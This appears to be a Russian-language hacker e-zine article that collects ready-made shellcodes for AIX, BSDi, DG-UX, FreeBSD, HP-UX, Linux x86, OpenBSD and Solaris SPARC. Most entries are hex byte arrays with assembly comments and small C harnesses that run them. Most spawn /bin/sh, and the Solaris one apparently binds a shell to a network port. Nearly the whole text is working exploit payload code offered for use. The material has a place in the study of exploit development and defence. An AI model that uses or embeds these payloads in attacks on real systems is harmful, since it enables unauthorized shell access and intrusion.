+-----------------------------------------------------------------------------------------------------------------------------------------------[CP #2]----+
|
|
|
|
|
|
|
  _|_| _|_|         _|  _|    _|_|_|
_|     _|  _|     _|_|_|_|_|  _|  _|
_| ODE _|_|         _|  _|      _|  
_|     _| IMPS    _|_|_|_|_|  _|    
    _|_| _|           _|  _|    _|_|_|  
|
|
|
|
|
|
|
+-------------------------------------------------------------------------------------------------------------------------------------------------------------+
+-----------------------------------------------[2x05 5h3llC0d35 (/home/cp2/hack/shellcodes)]-------------------------------------------+
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|

Здесь представлены некоторые шеллкоды для разных систем. Большое количество кодов вы сможете найти в архиве [files/shellcodes.tgz] журнала..



Начнем, с системы Aix.

шеллкод Георгия Гунински (Georgi Guninski), вызывает /bin/sh:
unsigned int code[]={
  0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  0x7c0903a6 , 0x4e800420, 0x0
};
Теперь комментарии на асме:
  7c0802a6        mfspr   r0,LR
  9421fbb0        stu     SP,-1104(SP) --получаем стэк
  90010458        st      r0,1112(SP)
  3c60f019        cau     r3,r0,0xf019 --CTR
  60632c48        lis     r3,r3,11336  --CTR
  90610440        st      r3,1088(SP)
  3c60d002        cau     r3,r0,0xd002 --TOC
  60634c0c        lis     r3,r3,19468  --TOC
  90610444        st      r3,1092(SP)
  3c602f62        cau     r3,r0,0x2f62 --'/bin/sh\x01'
  6063696e        lis     r3,r3,26990
  90610438        st      r3,1080(SP)
  3c602f73        cau     r3,r0,0x2f73
  60636801        lis     r3,r3,26625
  3863ffff        addi    r3,r3,-1
  9061043c        st      r3,1084(SP) --умираем с 0
  30610438        lis     r3,SP,1080
  7c842278        xor     r4,r4,r4    --argv=NULL
  80410440        lwz     RTOC,1088(SP)
  80010444        lwz     r0,1092(SP) --jump
  7c0903a6        mtspr   CTR,r0
  4e800420        bctr              --jump




Далее, система BSDi.
char code[] =
  "\xeb\x57\x5e\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e"
  "\x26\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8\x31"
  "\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2\x31\xc0\x88"
  "\x46\x0b\x89\xf3\x83\xc0\x05\x31\xc9\x83\xc1\x01\x31"
  "\xd2\xcd\x80\x89\xc3\x31\xc0\x83\xc0\x04\x31\xd2\x88"
  "\x56\x27\x89\xf1\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31"
  "\xc0\x83\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
  "BIN/SH";

main()
{
  int (*f)();
  f = (int (*)()) code;
  printf("BSDi old shellcode, %d bytes\n", strlen(code));
  (int)(*f)();
}

комментарии:
  jmp    0x57
  pop    %esi
  xor    %ebx,%ebx
  add    $0x8,%ebx
  add    $0x2,%ebx
  mov    %bl,0x26(%esi)
  xor    %ebx,%ebx
  add    $0x23,%ebx
  add    $0x23,%ebx
  mov    %bl,0xffffffa8(%esi)
  xor    %ebx,%ebx
  add    $0x26,%ebx
  add    $0x30,%ebx
  mov    %bl,0xffffffc2(%esi)
  xor    %eax,%eax
  mov    %al,0xb(%esi)
  mov    %esi,%ebx
  add    $0x5,%eax
  xor    %ecx,%ecx
  add    $0x1,%ecx
  xor    %edx,%edx
  int    $0x80
  mov    %eax,%ebx
  xor    %eax,%eax
  add    $0x4,%eax
  xor    %edx,%edx
  mov    %dl,0x27(%esi)
  mov    %esi,%ecx
  add    $0xc,%ecx
  add    $0x1b,%edx
  int    $0x80
  xor    %eax,%eax
  add    $0x6,%eax
  int    $0x80
  xor    %eax,%eax
  add    $0x1,%eax
  int    $0x80
  .string "BIN/SH"



Система DG-UX.

Code by Lamont Granquist:
int rawcode[] = {
  0x2230fec4,              /* subq $16,0x13c,$17  */
  0x47ff0412,              /* clr $18             */
  0x42509532,              /* subq $18, 0x84      */
  0x239fffff,              /* xor $18, 0xffffffff, $18  */
  0x4b84169c,
  0x465c0812,
  0xb2510134,              /* stl $18, 0x134($17) */
  0x265cff98,              /* lda $18, 0xff978cd0 */
  0x22528cd1,
  0x465c0812,              /* xor $18, 0xffffffff, $18  */
  0xb2510140,              /* stl $18, 0x140($17) */
  0xb6110148,              /* stq $16,0x148($17)  */
  0xb7f10150,              /* stq $31,0x150($17)  */
  0x22310148,              /* addq $17,0x148,$17  */
  0x225f013a,              /* ldil $18,0x13a    */
  0x425ff520,              /* subq $18,0xff,$0    */
  0x47ff0412,              /* clr $18     */
  0xffffffff,              /* call_pal 0x83   */
  0xd21fffed,              /* bsr $16,$l1    ENTRY      */
  0x6e69622f,              /* .ascii "/bin"   */
  /* .ascii "/sh\0" is generated */
};



BSD codes.

23 байта:
char fbsd_execve[]=
  "\x99"                  /* cdq      */
  "\x52"                  /* push %edx            */
  "\x68\x6e\x2f\x73\x68"  /* push $0x68732f6e     */
  "\x68\x2f\x2f\x62\x69"  /* push $0x69622f2f   */
  "\x89\xe3"              /* movl %esp,%ebx   */
  "\x51"                  /* push %ecx - or %edx :) */
  "\x52"                  /* push %edx - or %ecx :) */
  "\x53"                  /* push %ebx      */
  "\x53"                  /* push %ebx      */
  "\x6a\x3b"              /* push $0x3b     */
  "\x58"                  /* pop %eax     */
  "\xcd\x80";             /* int $0x80      */

int main() {
  void (*run)()=(void *)fbsd_execve;
  printf("%d bytes \n",strlen(fbsd_execve));
}
25 байт:
char sc[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";

int main(){
 void (*s)()=(void *)sc;
 printf("len : %d\n",strlen(sc));
 s();
}
Asm code:
                     
xorl %eax, %eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
pushl %eax
pushl %esp
pushl %ebx
movb $0x3b,%al
pushl %eax
int $0x80    



HP-UX

Code by K2 (ex /bin/sh)
u_char shellcode[] =
  "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
  "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
  "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";    



Linux *86

23 байта:
char linux[]=
  "\x99"      /* cdq              */
  "\x52"      /* push %edx        */
  "\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f */
  "\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f */
  "\x89\xe3"      /* mov %esp,%ebx    */
  "\x52"      /* push %edx        */
  "\x54"      /* push %esp        */
  "\x54"      /* push %esp        */
  "\x59\x6a"      /* pop %ecx         */
  "\x0b\x58"      /* push $0x0b       */
  "\xcd\x80";     /* int $0x80        */

int main(){
  void (*run)()=(void *)linux;
  printf("%d bytes \n",strlen(linux));
  run();
}



OpenBSD

так же 23 байта:
char open_bsd[]=
  "\x99"      /* cdq              */
  "\x52"      /* push %edx        */
  "\x68\x6e\x2f\x73\x68"  /* push $0x68732f6e */
  "\x68\x2f\x2f\x62\x69"  /* push $0x69622f2f */
  "\x89\xe3"      /* mov %esp,%ebx    */
  "\x52"      /* push %edx        */
  "\x54"      /* push %esp        */
  "\x53"      /* push %ebx        */
  "\x53"      /* push %ebx        */
  "\x6a\x3b"      /* push $0x3b       */
  "\x58"      /* pop %eax         */
  "\xcd\x80";     /* int $0x80        */

int main(){
  void (*run)()=(void *)open_bsd;
  printf("%d bytes\n",strlen(open_bsd));
  run();
}



Solaris - Sparc
char shellcode[] =
  "\xa0\x23\xa0\x10"  /* sub      %sp, 16, %l0      */
  "\xae\x23\x80\x10"  /* sub      %sp, %l0, %l7     */
  "\xee\x23\xbf\xec"  /* st       %l7, [%sp - 20]     */
  "\x82\x05\xe0\xd6"  /* add      %l7, 214, %g1     */
  "\x90\x25\xe0\x0e"  /* sub      %l7, 14, %o0      */
  "\x92\x25\xe0\x0e"  /* sub      %l7, 14, %o1      */
  "\x94\x1c\x40\x11"  /* xor      %l1, %l1, %o2     */
  "\x96\x1c\x40\x11"  /* xor      %l1, %l1, %o3     */
  "\x98\x25\xe0\x0f"  /* sub      %l7, 15, %o4      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\xa4\x1a\x80\x08"  /* xor      %o2, %o0, %l2     */
  "\xd2\x33\xbf\xf0"  /* sth      %o1, [%sp - 16]     */
  "\xac\x10\x27\xd1"  /* mov      2001, %l6     */
  "\xec\x33\xbf\xf2"  /* sth      %l6, [%sp - 14]     */
  "\xc0\x23\xbf\xf4"  /* st       %g0, [%sp - 12]     */
  "\x82\x05\xe0\xd8"  /* add      %l7, 216, %g1     */
  "\x90\x1a\xc0\x12"  /* xor      %o3, %l2, %o0     */
  "\x92\x1a\xc0\x10"  /* xor      %o3, %l0, %o1     */
  "\x94\x1a\xc0\x17"  /* xor      %o3, %l7, %o2     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x82\x05\xe0\xd9"  /* add      %l7, 217, %g1     */
  "\x90\x1a\xc0\x12"  /* xor      %o3, %l2, %o0     */
  "\x92\x25\xe0\x0b"  /* sub      %l7, 11, %o1      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x82\x05\xe0\xda"  /* add      %l7, 218, %g1     */
  "\x90\x1a\xc0\x12"  /* xor      %o3, %l2, %o0     */
  "\x92\x1a\xc0\x10"  /* xor      %o3, %l0, %o1     */
  "\x94\x23\xa0\x14"  /* sub      %sp, 20, %o2      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\xa6\x1a\xc0\x08"  /* xor      %o3, %o0, %l3     */
  "\x82\x05\xe0\x2e"  /* add      %l7, 46, %g1      */
  "\x90\x1a\xc0\x13"  /* xor      %o3, %l3, %o0     */
  "\x92\x25\xe0\x07"  /* sub      %l7, 7, %o1     */
  "\x94\x1b\x80\x0e"  /* xor      %sp, %sp, %o2     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x90\x1a\xc0\x13"  /* xor      %o3, %l3, %o0     */
  "\x92\x25\xe0\x07"  /* sub      %l7, 7, %o1     */
  "\x94\x02\xe0\x01"  /* add      %o3, 1, %o2     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x90\x1a\xc0\x13"  /* xor      %o3, %l3, %o0     */
  "\x92\x25\xe0\x07"  /* sub      %l7, 7, %o1     */
  "\x94\x02\xe0\x02"  /* add      %o3, 2, %o2     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x90\x1b\x80\x0e"  /* xor      %sp, %sp, %o0     */
  "\x82\x02\xe0\x17"  /* add      %o3, 23, %g1      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x21\x0b\xd8\x9a"  /* sethi    %hi(0x2f626800), %l0    */
  "\xa0\x14\x21\x6e"  /* or       %l0, 0x16e, %l0 ! 0x2f62696e  */
  "\x23\x0b\xdc\xda"  /* sethi    %hi(0x2f736800), %l1    */
  "\x90\x23\xa0\x10"  /* sub      %sp, 16, %o0      */
  "\x92\x23\xa0\x08"  /* sub      %sp, 8, %o1     */
  "\x94\x1b\x80\x0e"  /* xor      %sp, %sp, %o2     */
  "\xe0\x3b\xbf\xf0"  /* std      %l0, [%sp - 16]     */
  "\xd0\x23\xbf\xf8"  /* st       %o0, [%sp - 8]      */
  "\xc0\x23\xbf\xfc"  /* st       %g0, [%sp - 4]      */
  "\x82\x02\xe0\x3b"  /* add      %o3, 59, %g1      */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
  "\x90\x1b\x80\x0e"  /* xor      %sp, %sp, %o0     */
  "\x82\x02\xe0\x01"  /* add      %o3, 1, %g1     */
  "\x91\xd0\x38\x08"  /* ta       0x8       */
;

На этом закончим.. повторюсь, что больше шеллкодов под разные системы вы можете найти в архиве [files/shellcodes.tgz] журнала..
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
+-----[content]-----------------------------------------------------------------------------------------------------------------------------[mail us]-----+